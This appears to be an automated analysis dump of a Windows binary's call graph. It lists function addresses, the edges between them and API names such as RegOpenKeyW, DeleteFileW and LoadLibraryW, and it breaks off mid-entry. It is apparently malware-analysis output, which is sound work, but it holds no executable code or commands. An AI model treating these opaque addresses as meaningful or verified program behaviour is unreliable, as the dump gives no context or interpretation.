8478->8482 8481 402bab 2 API calls 8479->8481 8481->8482 8482->8459 8482->8478 8484 402bab 2 API calls 8482->8484 8631 4098a7 8482->8631 8484->8482 8486 402b7c 2 API calls 8485->8486 8487 404512 8486->8487 8489 404585 GetLastError 8487->8489 8490 402bab 2 API calls 8487->8490 8493 402b7c 2 API calls 8487->8493 8494 40457c 8487->8494 8886 4044a7 8487->8886 8491 404592 8489->8491 8489->8494 8490->8487 8492 402bab 2 API calls 8491->8492 8492->8494 8493->8487 8494->8420 8640 40642c 8495->8640 8497 40a469 8498 40c4ff 8497->8498 8643 4047e6 8497->8643 8498->8460 8501 4040bb 12 API calls 8502 40bf88 8501->8502 8502->8498 8503 403c90 8 API calls 8502->8503 8504 40bfaa 8503->8504 8505 402b7c 2 API calls 8504->8505 8507 40bfc1 8505->8507 8506 40c4f3 8508 403f9e 5 API calls 8506->8508 8509 40c3aa 8507->8509 8650 40a423 8507->8650 8508->8498 8509->8506 8512 4056bf 2 API calls 8509->8512 8515 40c4e3 8509->8515 8510 402bab 2 API calls 8510->8506 8514 40c3d2 8512->8514 8514->8515 8517 4040bb 12 API calls 8514->8517 8515->8510 8516 405f08 4 API calls 8518 40c005 8516->8518 8519 40c3f3 8517->8519 8520 40c021 8518->8520 8653 40a43f 8518->8653 8522 40c4d1 8519->8522 8710 405a52 8519->8710 8521 4031e5 4 API calls 8520->8521 8524 40c034 8521->8524 8527 413aca 4 API calls 8522->8527 8533 4031e5 4 API calls 8524->8533 8528 40c4dd 8527->8528 8531 405695 2 API calls 8528->8531 8529 40c411 8715 405a87 8529->8715 8530 402bab 2 API calls 8530->8520 8531->8515 8539 40c04d 8533->8539 8534 40c4b3 8535 402bab 2 API calls 8534->8535 8537 40c4cb 8535->8537 8536 405a52 4 API calls 8547 40c423 8536->8547 8538 403f9e 5 API calls 8537->8538 8538->8522 8541 4031e5 4 API calls 8539->8541 8540 405a87 4 API calls 8540->8547 8542 40c085 8541->8542 8544 4031e5 4 API calls 8542->8544 8543 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8543->8547 8545 40c09c 8544->8545 8548 4031e5 4 API calls 8545->8548 8546 402bab 2 API calls 8546->8547 8547->8534 8547->8536 8547->8540 8547->8543 8547->8546 8549 40c0b3 8548->8549 8550 4031e5 4 API calls 8549->8550 8551 40c0ca 8550->8551 8552 4031e5 4 API calls 8551->8552 8553 40c0e7 8552->8553 8554 4031e5 4 API calls 8553->8554 8555 40c100 8554->8555 8556 4031e5 4 API calls 8555->8556 8557 40c119 8556->8557 8558 4031e5 4 API calls 8557->8558 8559 40c132 8558->8559 8560 4031e5 4 API calls 8559->8560 8561 40c14b 8560->8561 8562 4031e5 4 API calls 8561->8562 8563 40c164 8562->8563 8564 4031e5 4 API calls 8563->8564 8565 40c17d 8564->8565 8566 4031e5 4 API calls 8565->8566 8567 40c196 8566->8567 8568 4031e5 4 API calls 8567->8568 8569 40c1af 8568->8569 8570 4031e5 4 API calls 8569->8570 8571 40c1c8 8570->8571 8572 4031e5 4 API calls 8571->8572 8573 40c1de 8572->8573 8574 4031e5 4 API calls 8573->8574 8575 40c1f4 8574->8575 8576 4031e5 4 API calls 8575->8576 8577 40c20d 8576->8577 8578 4031e5 4 API calls 8577->8578 8579 40c226 8578->8579 8580 4031e5 4 API calls 8579->8580 8581 40c23f 8580->8581 8582 4031e5 4 API calls 8581->8582 8583 40c258 8582->8583 8584 4031e5 4 API calls 8583->8584 8585 40c273 8584->8585 8586 4031e5 4 API calls 8585->8586 8587 40c28a 8586->8587 8588 4031e5 4 API calls 8587->8588 8591 40c2d5 8588->8591 8589 40c3a2 8590 402bab 2 API calls 8589->8590 8590->8509 8591->8589 8592 4031e5 4 API calls 8591->8592 8593 40c315 8592->8593 8594 40c38b 8593->8594 8656 404866 8593->8656 8595 403c40 5 API calls 8594->8595 8597 40c397 8595->8597 8599 403c40 5 API calls 8597->8599 8599->8589 8600 40c382 8602 403c40 5 API calls 8600->8602 8602->8594 8604 406c4c 6 API calls 8605 40c355 8604->8605 8605->8600 8680 4126a7 8605->8680 8608 4031e5 4 API calls 8607->8608 8609 405f1d 8608->8609 8610 402b7c 2 API calls 8609->8610 8613 405f55 8609->8613 8611 405f36 8610->8611 8612 4031e5 4 API calls 8611->8612 8611->8613 8612->8613 8613->8456 8613->8459 8613->8464 8613->8465 8615 409673 8614->8615 8620 40956d 8614->8620 8615->8474 8616 408b45 6 API calls 8616->8620 8617 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8617->8620 8618 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8618->8620 8619 402bab GetProcessHeap HeapFree 8619->8620 8620->8615 8620->8616 8620->8617 8620->8618 8620->8619 8622 4040bb 12 API calls 8621->8622 8629 4096a9 8622->8629 8623 40989f 8623->8479 8624 409896 8625 403f9e 5 API calls 8624->8625 8625->8623 8627 408b45 6 API calls 8627->8629 8628 402bab GetProcessHeap HeapFree 8628->8629 8629->8623 8629->8624 8629->8627 8629->8628 8630 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8629->8630 8879 4059d8 8629->8879 8630->8629 8632 4040bb 12 API calls 8631->8632 8639 4098c1 8632->8639 8633 4099fb 8633->8482 8634 4099f3 8635 403f9e 5 API calls 8634->8635 8635->8633 8636 402bab GetProcessHeap HeapFree 8636->8639 8637 4059d8 4 API calls 8637->8639 8638 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8638->8639 8639->8633 8639->8634 8639->8636 8639->8637 8639->8638 8641 4031e5 4 API calls 8640->8641 8642 406441 GetNativeSystemInfo 8641->8642 8642->8497 8644 4031e5 4 API calls 8643->8644 8647 40480a 8644->8647 8645 4031e5 4 API calls 8645->8647 8646 40484f 8648 403c40 5 API calls 8646->8648 8647->8645 8647->8646 8649 40485d 8647->8649 8648->8649 8649->8498 8649->8501 8651 4031e5 4 API calls 8650->8651 8652 40a435 8651->8652 8652->8516 8654 4031e5 4 API calls 8653->8654 8655 40a451 8654->8655 8655->8530 8657 4031e5 4 API calls 8656->8657 8658 40487c 8657->8658 8658->8600 8659 406c4c 8658->8659 8720 4068eb 8659->8720 8661 406e02 8661->8604 8662 406cab 8732 40469b 8662->8732 8663 406c6c 8663->8661 8663->8662 8729 406894 8663->8729 8670 406df1 8671 40469b 4 API calls 8670->8671 8671->8661 8672 406cef 8672->8670 8673 4031e5 4 API calls 8672->8673 8674 406d26 8673->8674 8674->8670 8675 40771e 6 API calls 8674->8675 8679 406d57 8675->8679 8676 406da2 8677 4031e5 4 API calls 8676->8677 8677->8670 8679->8676 8745 4068b0 8679->8745 8681 4126d1 8680->8681 8683 4126bb 8680->8683 8682 412840 8681->8682 8807 407055 8681->8807 8682->8600 8683->8682 8801 40488c 8683->8801 8687 412837 8689 403c40 5 API calls 8687->8689 8689->8682 8691 41281e 8692 4070ff 6 API calls 8691->8692 8692->8687 8693 407055 6 API calls 8694 412742 8693->8694 8694->8691 8695 40719a 6 API calls 8694->8695 8696 41276e 8695->8696 8697 412804 8696->8697 8823 406f4a 8696->8823 8851 4070ff 8697->8851 8700 41279a 8829 412553 8700->8829 8873 405907 8710->8873 8712 405a61 8713 405a76 8712->8713 8714 405907 4 API calls 8712->8714 8713->8529 8714->8712 8716 402b7c 2 API calls 8715->8716 8719 405a99 8716->8719 8717 405ade 8717->8547 8719->8717 8876 40595e 8719->8876 8748 4076a8 8720->8748 8722 406913 8723 406a61 8722->8723 8724 40771e 6 API calls 8722->8724 8723->8663 8728 406949 8724->8728 8725 40771e 6 API calls 8725->8728 8726 404678 4 API calls 8726->8728 8728->8723 8728->8725 8728->8726 8754 4046c2 8728->8754 8730 4031e5 4 API calls 8729->8730 8731 4068a6 8730->8731 8731->8663 8733 4046a4 8732->8733 8735 4046b4 8732->8735 8734 4031e5 4 API calls 8733->8734 8734->8735 8735->8661 8736 404678 8735->8736 8737 4031e5 4 API calls 8736->8737 8738 40468b 8737->8738 8738->8661 8739 40771e 8738->8739 8740 407748 8739->8740 8741 407737 8739->8741 8740->8672 8742 407644 6 API calls 8741->8742 8743 407741 8742->8743 8744 406baa 6 API calls 8743->8744 8744->8740 8746 4031e5 4 API calls 8745->8746 8747 4068c2 8746->8747 8747->8679 8749 4076c1 8748->8749 8750 4076d2 8748->8750 8762 407644 8749->8762 8750->8722 8755 4046d3 8754->8755 8756 4046d9 8754->8756 8797 40464c 8755->8797 8758 4046e9 8756->8758 8760 404678 4 API calls 8756->8760 8759 404714 8758->8759 8761 40469b 4 API calls 8758->8761 8759->8728 8760->8758 8761->8759 8763 407653 8762->8763 8764 407661 8762->8764 8763->8764 8770 406a6b 8763->8770 8766 406baa 8764->8766 8767 406bbb 8766->8767 8769 406bc8 8766->8769 8767->8769 8778 407402 8767->8778 8769->8750 8771 406a81 8770->8771 8772 402b7c 2 API calls 8771->8772 8773 406b8b 8771->8773 8774 406894 4 API calls 8771->8774 8775 406b96 8771->8775 8777 402bab 2 API calls 8771->8777 8772->8771 8773->8764 8774->8771 8776 402bab 2 API calls 8775->8776 8776->8773 8777->8771 8779 407644 6 API calls 8778->8779 8780 407412 8779->8780 8781 402b7c 2 API calls 8780->8781 8788 407450 8780->8788 8782 407483 8781->8782 8783 402b7c 2 API calls 8782->8783 8782->8788 8785 4074ce 8783->8785 8784 4074da 8786 4068cc 2 API calls 8784->8786 8785->8784 8787 402b7c 2 API calls 8785->8787 8786->8788 8791 40751f 8787->8791 8788->8769 8789 40752b 8790 4068cc 2 API calls 8789->8790 8790->8784 8791->8789 8793 4068cc 8791->8793 8794 4068d6 8793->8794 8795 4068e3 8793->8795 8794->8795 8796 402bab GetProcessHeap HeapFree 8794->8796 8795->8789 8796->8795 8798 404666 8797->8798 8799 404659 8797->8799 8798->8756 8800 4031e5 4 API calls 8799->8800 8800->8798 8802 4047e6 5 API calls 8801->8802 8803 404897 8802->8803 8804 40489c 8803->8804 8859 4047c7 8803->8859 8804->8681 8808 40706f 8807->8808 8809 407084 8807->8809 8808->8809 8810 407644 6 API calls 8808->8810 8814 4070e4 8809->8814 8862 406fd2 8809->8862 8811 40707d 8810->8811 8813 406baa 6 API calls 8811->8813 8813->8809 8814->8687 8815 40719a 8814->8815 8816 4071b0 8815->8816 8818 4071c5 8815->8818 8817 407644 6 API calls 8816->8817 8816->8818 8819 4071be 8817->8819 8821 406fd2 4 API calls 8818->8821 8822 407226 8818->8822 8820 406baa 6 API calls 8819->8820 8820->8818 8821->8822 8822->8691 8822->8693 8824 406f64 8823->8824 8827 406f75 8823->8827 8825 407644 6 API calls 8824->8825 8826 406f6e 8825->8826 8828 406baa 6 API calls 8826->8828 8827->8700 8828->8827 8870 4060ac 8829->8870 8852 407116 8851->8852 8854 40712b 8851->8854 8853 407644 6 API calls 8852->8853 8852->8854 8855 407124 8853->8855 8856 406fd2 4 API calls 8854->8856 8858 407187 8854->8858 8857 406baa 6 API calls 8855->8857 8856->8858 8857->8854 8858->8691 8860 4031e5 4 API calls 8859->8860 8861 4047d9 8860->8861 8861->8681 8863 406fde 8862->8863 8864 407027 8863->8864 8865 4031e5 4 API calls 8863->8865 8864->8814 8866 406ffa 8865->8866 8867 4031e5 4 API calls 8866->8867 8868 407011 8867->8868 8869 4031e5 4 API calls 8868->8869 8869->8864 8871 4031e5 4 API calls 8870->8871 8872 4060bb 8871->8872 8872->8872 8874 4031e5 4 API calls 8873->8874 8875 40591a 8874->8875 8875->8712 8877 4031e5 4 API calls 8876->8877 8878 405971 8877->8878 8878->8719 8880 4031e5 4 API calls 8879->8880 8881 4059ed 8880->8881 8882 402b7c 2 API calls 8881->8882 8883 405a38 8881->8883 8884 405a16 8882->8884 8883->8629 8884->8883 8885 4031e5 4 API calls 8884->8885 8885->8883 8887 4031e5 4 API calls 8886->8887 8888 4044b9 8887->8888 8888->8487 9871 40a349 9872 4098a7 13 API calls 9871->9872 9873 40a359 9872->9873 9047 408952 9068 40823f 9047->9068 9050 408960 9052 4056bf 2 API calls 9050->9052 9053 40896a 9052->9053 9096 408862 9053->9096 9055 413aca 4 API calls 9056 4089d4 9055->9056 9058 405695 2 API calls 9056->9058 9057 408975 9065 4089c4 9057->9065 9104 4087d6 9057->9104 9060 4089df 9058->9060 9065->9055 9066 402bab 2 API calls 9067 40899d 9066->9067 9067->9065 9067->9066 9069 40824d 9068->9069 9070 40831b 9069->9070 9071 4031e5 4 API calls 9069->9071 9070->9050 9084 4083bb 9070->9084 9072 40826d 9071->9072 9073 4031e5 4 API calls 9072->9073 9074 408289 9073->9074 9075 4031e5 4 API calls 9074->9075 9076 4082a5 9075->9076 9077 4031e5 4 API calls 9076->9077 9078 4082c1 9077->9078 9079 4031e5 4 API calls 9078->9079 9080 4082e2 9079->9080 9081 4031e5 4 API calls 9080->9081 9082 4082ff 9081->9082 9083 4031e5 4 API calls 9082->9083 9083->9070 9132 408363 9084->9132 9087 4084ab 9087->9050 9088 4056bf 2 API calls 9089 4083f4 9088->9089 9093 408492 9089->9093 9135 40815d 9089->9135 9150 40805d 9089->9150 9090 413aca 4 API calls 9091 4084a0 9090->9091 9092 405695 2 API calls 9091->9092 9092->9087 9093->9090 9165 404b8f 9096->9165 9098 408946 9098->9057 9099 40887e 9099->9098 9100 4031e5 4 API calls 9099->9100 9101 40893e 9099->9101 9103 402b7c 2 API calls 9099->9103 9100->9099 9168 404a39 9101->9168 9103->9099 9105 402b7c 2 API calls 9104->9105 9106 4087e7 9105->9106 9107 4031e5 4 API calls 9106->9107 9111 40885a 9106->9111 9108 408802 9107->9108 9109 408853 9108->9109 9113 40884d 9108->9113 9177 408522 9108->9177 9181 4084b4 9108->9181 9110 402bab 2 API calls 9109->9110 9110->9111 9116 408749 9111->9116 9184 4084d4 9113->9184 9117 404b8f 5 API calls 9116->9117 9122 408765 9117->9122 9118 4087cf 9124 4085d1 9118->9124 9119 4031e5 4 API calls 9119->9122 9120 4087c7 9123 404a39 5 API calls 9120->9123 9121 408522 4 API calls 9121->9122 9122->9118 9122->9119 9122->9120 9122->9121 9123->9118 9125 4086c2 9124->9125 9127 4085e9 9124->9127 9125->9067 9127->9125 9128 402bab 2 API calls 9127->9128 9129 4031e5 4 API calls 9127->9129 9190 4089e6 9127->9190 9209 4086c9 9127->9209 9213 4036a3 9127->9213 9128->9127 9129->9127 9133 4031e5 4 API calls 9132->9133 9134 408386 9133->9134 9134->9087 9134->9088 9136 40816f 9135->9136 9137 4081b6 9136->9137 9138 4081fd 9136->9138 9149 4081ef 9136->9149 9140 405872 4 API calls 9137->9140 9139 405872 4 API calls 9138->9139 9141 408213 9139->9141 9142 4081cf 9140->9142 9143 405872 4 API calls 9141->9143 9144 405872 4 API calls 9142->9144 9145 408222 9143->9145 9146 4081df 9144->9146 9147 405872 4 API calls 9145->9147 9148 405872 4 API calls 9146->9148 9147->9149 9148->9149 9149->9089 9151 40808c 9150->9151 9152 4080d2 9151->9152 9153 408119 9151->9153 9164 40810b 9151->9164 9155 405872 4 API calls 9152->9155 9154 405872 4 API calls 9153->9154 9156 40812f 9154->9156 9157 4080eb 9155->9157 9159 405872 4 API calls 9156->9159 9158 405872 4 API calls 9157->9158 9160 4080fb 9158->9160 9161 40813e 9159->9161 9162 405872 4 API calls 9160->9162 9163 405872 4 API calls 9161->9163 9162->9164 9163->9164 9164->9089 9171 404a19 9165->9171 9167 404ba0 9167->9099 9174 4049ff 9168->9174 9170 404a44 9170->9098 9172 4031e5 4 API calls 9171->9172 9173 404a2c RegOpenKeyW 9172->9173 9173->9167 9175 4031e5 4 API calls 9174->9175 9176 404a12 RegCloseKey 9175->9176 9176->9170 9179 408534 9177->9179 9178 4085af 9178->9108 9179->9178 9187 4084ee 9179->9187 9182 4031e5 4 API calls 9181->9182 9183 4084c7 9182->9183 9183->9108 9185 4031e5 4 API calls 9184->9185 9186 4084e7 9185->9186 9186->9109 9188 4031e5 4 API calls 9187->9188 9189 408501 9188->9189 9189->9178 9191 4031e5 4 API calls 9190->9191 9192 408a06 9191->9192 9193 408b21 9192->9193 9194 4031e5 4 API calls 9192->9194 9193->9127 9197 408a32 9194->9197 9195 408b17 9225 403649 9195->9225 9197->9195 9216 403666 9197->9216 9200 4031e5 4 API calls 9202 408a88 9200->9202 9203 4031e5 4 API calls 9202->9203 9208 408b0e 9202->9208 9204 408ac4 9203->9204 9205 405b6f 6 API calls 9204->9205 9206 408aff 9205->9206 9206->9208 9219 408508 9206->9219 9222 40362f 9208->9222 9210 408744 9209->9210 9212 4086e2 9209->9212 9210->9127 9211 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9211->9212 9212->9210 9212->9211 9214 4031e5 4 API calls 9213->9214 9215 4036b5 9214->9215 9215->9127 9217 4031e5 4 API calls 9216->9217 9218 403679 9217->9218 9218->9200 9218->9208 9220 4031e5 4 API calls 9219->9220 9221 40851b 9220->9221 9221->9208 9223 4031e5 4 API calls 9222->9223 9224 403642 9223->9224 9224->9195 9226 4031e5 4 API calls 9225->9226 9227 40365c 9226->9227 9227->9193 9901 40f252 9902 404bee 6 API calls 9901->9902 9903 40f269 9902->9903 9904 404bee 6 API calls 9903->9904 9915 40f2ff 9903->9915 9905 40f282 9904->9905 9906 404bee 6 API calls 9905->9906 9907 40f290 9906->9907 9918 404c4e 9907->9918 9909 40f2a7 9910 405872 4 API calls 9909->9910 9909->9915 9911 40f2cd 9910->9911 9912 405872 4 API calls 9911->9912 9913 40f2dc 9912->9913 9914 405872 4 API calls 9913->9914 9916 40f2ee 9914->9916 9917 405762 4 API calls 9916->9917 9917->9915 9919 402b7c 2 API calls 9918->9919 9921 404c60 9919->9921 9920 404ca4 9920->9909 9921->9920 9922 4031e5 4 API calls 9921->9922 9923 404c8d 9922->9923 9923->9920 9924 402bab 2 API calls 9923->9924 9924->9920 10042 41045c 10043 4040bb 12 API calls 10042->10043 10044 410477 10043->10044 10045 41060b 10044->10045 10073 407851 10044->10073 10047 41048f 10049 407851 2 API calls 10047->10049 10053 410604 10047->10053 10048 403f9e 5 API calls 10048->10045 10050 4104a9 10049->10050 10055 4105e0 10050->10055 10056 405ae9 6 API calls 10050->10056 10058 41056f 10050->10058 10059 4105eb 10050->10059 10051 402bab 2 API calls 10051->10053 10052 402bab 2 API calls 10054 4105fb 10052->10054 10053->10048 10054->10051 10057 402bab 2 API calls 10055->10057 10055->10059 10056->10050 10057->10059 10058->10055 10060 4105d6 10058->10060 10062 412269 6 API calls 10058->10062 10059->10052 10059->10054 10061 402bab 2 API calls 10060->10061 10061->10055 10063 410580 10062->10063 10063->10060 10064 405872 4 API calls 10063->10064 10065 410599 10064->10065 10066 405872 4 API calls 10065->10066 10067 4105a9 10066->10067 10068 405872 4 API calls 10067->10068 10069 4105bb 10068->10069 10070 405872 4 API calls 10069->10070 10071 4105cd 10070->10071 10072 402bab 2 API calls 10071->10072 10072->10060 10074 407866 10073->10074 10075 402b7c 2 API calls 10074->10075 10076 407899 10074->10076 10075->10076 10076->10047 9289 40f561 9292 40f4b6 9289->9292 9293 413b28 6 API calls 9292->9293 9294 40f4bf 9293->9294 9295 405b6f 6 API calls 9294->9295 9296 40f559 9294->9296 9297 413a58 13 API calls 9294->9297 9298 402bab GetProcessHeap HeapFree 9294->9298 9295->9294 9297->9294 9298->9294 9302 403b64 9303 4031e5 4 API calls 9302->9303 9304 403b77 PathFileExistsW 9303->9304 10197 40d069 10198 404bee 6 API calls 10197->10198 10199 40d080 10198->10199 10200 404bee 6 API calls 10199->10200 10222 40d1e2 10199->10222 10201 40d099 10200->10201 10202 404bee 6 API calls 10201->10202 10203 40d0a7 10202->10203 10204 404ba7 4 API calls 10203->10204 10205 40d0b6 10204->10205 10206 404bee 6 API calls 10205->10206 10207 40d0c5 10206->10207 10208 404c4e 6 API calls 10207->10208 10209 40d0dc 10208->10209 10210 404bee 6 API calls 10209->10210 10211 40d0eb 10210->10211 10212 404ba7 4 API calls 10211->10212 10213 40d0fa 10212->10213 10214 404bee 6 API calls 10213->10214 10215 40d109 10214->10215 10216 404c4e 6 API calls 10215->10216 10217 40d123 10216->10217 10218 405872 4 API calls 10217->10218 10217->10222 10219 40d14a 10218->10219 10220 405872 4 API calls 10219->10220 10221 40d159 10220->10221 10223 405872 4 API calls 10221->10223 10224 40d16b 10223->10224 10225 405781 4 API calls 10224->10225 10226 40d179 10225->10226 10227 405872 4 API calls 10226->10227 10228 40d18b 10227->10228 10229 405762 4 API calls 10228->10229 10230 40d19f 10229->10230 10231 405872 4 API calls 10230->10231 10232 40d1b1 10231->10232 10233 405781 4 API calls 10232->10233 10234 40d1bf 10233->10234 10235 405872 4 API calls 10234->10235 10236 40d1d1 10235->10236 10237 405762 4 API calls 10236->10237 10237->10222 9331 40f16e 9332 4056bf 2 API calls 9331->9332 9333 40f17b 9332->9333 9334 412093 20 API calls 9333->9334 9335 40f19e 9334->9335 9336 412093 20 API calls 9335->9336 9337 40f1b6 9336->9337 9338 412093 20 API calls 9337->9338 9339 40f1cc 9338->9339 9340 412093 20 API calls 9339->9340 9341 40f1e2 9340->9341 9342 413aca 4 API calls 9341->9342 9343 40f1ef 9342->9343 9344 405695 2 API calls 9343->9344 9345 40f1fa 9344->9345 9346 40ce71 9347 413b28 6 API calls 9346->9347 9348 40ce78 9347->9348 9349 405b6f 6 API calls 9348->9349 9351 40ce83 9349->9351 9350 403fbf 7 API calls 9352 40cecc 9350->9352 9354 403d74 19 API calls 9351->9354 9358 40cec1 9351->9358 9364 40ceba 9351->9364 9353 403d74 19 API calls 9352->9353 9363 40cefb 9352->9363 9356 40cee7 9353->9356 9357 40cead 9354->9357 9355 402bab 2 API calls 9355->9358 9359 40cef4 9356->9359 9360 402bab 2 API calls 9356->9360 9362 402bab 2 API calls 9357->9362 9357->9364 9358->9350 9361 402bab 2 API calls 9359->9361 9360->9359 9361->9363 9362->9364 9364->9355 9365 406472 9366 4031e5 4 API calls 9365->9366 9367 406484 Sleep 9366->9367 9737 40f204 9738 405781 4 API calls 9737->9738 9739 40f214 9738->9739 9740 4057df 13 API calls 9739->9740 9741 40f226 9740->9741 9425 403c08 9426 4031e5 4 API calls 9425->9426 9427 403c1a DeleteFileW 9426->9427 9428 410a09 9429 41219c 14 API calls 9428->9429 9430 410a1b 9429->9430 9431 41219c 14 API calls 9430->9431 9432 410a23 9431->9432 9433 41219c 14 API calls 9432->9433 9434 410a2c 9433->9434 9435 41219c 14 API calls 9434->9435 9436 410a38 9435->9436 9437 404b22 6 API calls 9436->9437 9438 410a4c 9437->9438 9439 403fbf 7 API calls 9438->9439 9444 410a7a 9438->9444 9440 410a5c 9439->9440 9441 413a58 13 API calls 9440->9441 9446 410a71 9440->9446 9443 410a6b 9441->9443 9442 402bab 2 API calls 9442->9444 9445 402bab 2 API calls 9443->9445 9445->9446 9446->9442 9813 410d09 9814 410d56 9813->9814 9815 410d17 9813->9815 9816 413a58 13 API calls 9814->9816 9829 406642 9815->9829 9819 410d6f 9816->9819 9820 4056bf 2 API calls 9821 410d2e 9820->9821 9842 405641 9821->9842 9823 410d41 9824 413aca 4 API calls 9823->9824 9825 410d4a 9824->9825 9826 405695 2 API calls 9825->9826 9827 410d50 9826->9827 9828 4036a3 4 API calls 9827->9828 9828->9814 9830 406662 9829->9830 9831 4031e5 4 API calls 9830->9831 9832 406676 9831->9832 9846 4066bf 9832->9846 9837 4066b1 9840 4036a3 4 API calls 9837->9840 9838 4066a7 9839 4036a3 4 API calls 9838->9839 9841 4066ac 9839->9841 9840->9841 9841->9814 9841->9820 9843 40564d 9842->9843 9844 405673 9842->9844 9843->9844 9845 4056fc 4 API calls 9843->9845 9844->9823 9845->9844 9847 4031e5 4 API calls 9846->9847 9848 4066dc 9847->9848 9849 4066f6 SetLastError 9848->9849 9850 406708 GetLastError 9848->9850 9867 406693 9849->9867 9851 406713 9850->9851 9850->9867 9852 4031e5 4 API calls 9851->9852 9853 406725 9852->9853 9854 4031e5 4 API calls 9853->9854 9853->9867 9855 40673f 9854->9855 9856 406753 9855->9856 9857 406749 9855->9857 9859 4031e5 4 API calls 9856->9859 9858 4036a3 4 API calls 9857->9858 9858->9867 9860 406761 9859->9860 9861 40678a 9860->9861 9862 40677c 9860->9862 9863 4036a3 4 API calls 9861->9863 9864 4036a3 4 API calls 9862->9864 9863->9867 9865 406781 9864->9865 9866 4036a3 4 API calls 9865->9866 9866->9867 9868 406455 9867->9868 9869 4031e5 4 API calls 9868->9869 9870 406468 9869->9870 9870->9837 9870->9838 9447 40c509 9448 412093 20 API calls 9447->9448 9449 40c51e 9448->9449 9456 40910d 9457 404b22 6 API calls 9456->9457 9458 409124 9457->9458 9459 40917a 9458->9459 9460 405b6f 6 API calls 9458->9460 9461 40913e 9460->9461 9462 409173 9461->9462 9463 404b22 6 API calls 9461->9463 9464 402bab 2 API calls 9462->9464 9465 409153 9463->9465 9464->9459 9466 40916a 9465->9466 9467 409408 15 API calls 9465->9467 9468 402bab 2 API calls 9466->9468 9469 409164 9467->9469 9468->9462 9470 402bab 2 API calls 9469->9470 9470->9466 9474 410410 9475 4056bf 2 API calls 9474->9475 9476 41041b 9475->9476 9477 412093 20 API calls 9476->9477 9478 41043c 9477->9478 9479 413aca 4 API calls 9478->9479 9480 410449 9479->9480 9481 405695 2 API calls 9480->9481 9482 410454 9481->9482 9509 40c71a 9510 41219c 14 API calls 9509->9510 9511 40c728 9510->9511 9970 410b1a 9971 404bee 6 API calls 9970->9971 9972 410b31 9971->9972 9973 404bee 6 API calls 9972->9973 9983 410c6d 9972->9983 9974 410b5a 9973->9974 9975 404bee 6 API calls 9974->9975 9976 410b69 9975->9976 9977 404bee 6 API calls 9976->9977 9978 410b78 9977->9978 10003 404ba7 9978->10003 9981 404ba7 4 API calls 9982 410b95 9981->9982 9982->9983 9984 405872 4 API calls 9982->9984 9985 410bd7 9984->9985 9986 405872 4 API calls 9985->9986 9987 410be8 9986->9987 9988 405872 4 API calls 9987->9988 9989 410bf9 9988->9989 9990 405781 4 API calls 9989->9990 9991 410c07 9990->9991 9992 405781 4 API calls 9991->9992 9996 410c15 9992->9996 9993 410c4e 9994 405762 4 API calls 9993->9994 9995 410c60 9994->9995 9995->9983 9997 403f9e 5 API calls 9995->9997 9996->9993 10006 405e5a 9996->10006 9997->9983 10000 4040bb 12 API calls 10001 410c44 10000->10001 10002 402bab 2 API calls 10001->10002 10002->9993 10004 4031e5 4 API calls 10003->10004 10005 404bca 10004->10005 10005->9981 10007 402b7c 2 API calls 10006->10007 10008 405e72 10007->10008 10009 4031e5 4 API calls 10008->10009 10011 405ea3 10008->10011 10010 405e94 10009->10010 10010->10011 10012 402bab 2 API calls 10010->10012 10011->9993 10011->10000 10012->10011 10013 40f81c 10014 404bee 6 API calls 10013->10014 10016 40f833 10014->10016 10015 40f94f 10016->10015 10017 404bee 6 API calls 10016->10017 10018 40f85c 10017->10018 10019 404bee 6 API calls 10018->10019 10020 40f86b 10019->10020 10021 404bee 6 API calls 10020->10021 10022 40f87a 10021->10022 10023 404bee 6 API calls 10022->10023 10024 40f888 10023->10024 10025 404ba7 4 API calls 10024->10025 10026 40f897 10025->10026 10026->10015 10027 405872 4 API calls 10026->10027 10028 40f8d8 10027->10028 10029 405872 4 API calls 10028->10029 10030 40f8ea 10029->10030 10031 405872 4 API calls 10030->10031 10032 40f8fa 10031->10032 10033 405872 4 API calls 10032->10033 10034 40f90c 10033->10034 10035 405781 4 API calls 10034->10035 10036 40f91d 10035->10036 10037 4040bb 12 API calls 10036->10037 10038 40f92d 10037->10038 10039 405762 4 API calls 10038->10039 10040 40f93f 10039->10040 10040->10015 10041 403f9e 5 API calls 10040->10041 10041->10015 9524 402c1f 9525 4031e5 4 API calls 9524->9525 9526 402c31 LoadLibraryW 9525->9526 10109 407e1f 10110 407e61 10109->10110 10111 407e2c 10109->10111 10113 407ea6 10110->10113 10117 407eb6 10110->10117 10121 405872 4 API calls 10110->10121 10114 402bab 2 API calls 10111->10114 10115 407e3e 10111->10115 10119 407e51 10111->10119 10112 407ed4 10116 402bab 2 API calls 10113->10116 10113->10117 10114->10115 10115->10112 10120 402bab 2 API calls 10115->10120 10116->10117 10118 402bab 2 API calls 10117->10118 10117->10119 10118->10119 10119->10112 10122 402bab 2 API calls 10119->10122 10120->10119 10123 407e86 10121->10123 10122->10112 10124 405872 4 API calls 10123->10124 10125 407e96 10124->10125 10126 405872 4 API calls 10125->10126 10126->10113 9539 405924 9540 4031e5 4 API calls 9539->9540 9541 405937 StrStrW 9540->9541 10135 410927 10136 4044ee 7 API calls 10135->10136 10137 41093d 10136->10137 10138 4109a4 10137->10138 10139 4056bf 2 API calls 10137->10139 10142 410954 10139->10142 10140 4044ee 7 API calls 10140->10142 10142->10140 10143 402bab 2 API calls 10142->10143 10144 410990 10142->10144 10150 41080e 10142->10150 10143->10142 10145 413aca 4 API calls 10144->10145 10146 410998 10145->10146 10147 405695 2 API calls 10146->10147 10148 41099e 10147->10148 10149 402bab 2 API calls 10148->10149 10149->10138 10151 410821 10150->10151 10161 41091f 10151->10161 10162 410701 10151->10162 10154 405872 4 API calls 10155 410900 10154->10155 10156 405872 4 API calls 10155->10156 10157 41090d 10156->10157 10158 405872 4 API calls 10157->10158 10159 410919 10158->10159 10160 402bab 2 API calls 10159->10160 10160->10161 10161->10142 10163 405f08 4 API calls 10162->10163 10165 410713 10163->10165 10164 410804 10164->10154 10164->10161 10165->10164 10166 402b7c 2 API calls 10165->10166 10168 410748 10166->10168 10167 402bab 2 API calls 10167->10164 10169 402b7c 2 API calls 10168->10169 10171 4107fd 10168->10171 10172 4107ad 10169->10172 10170 402bab 2 API calls 10170->10171 10171->10167 10172->10170 10173 40d726 10174 404bee 6 API calls 10173->10174 10175 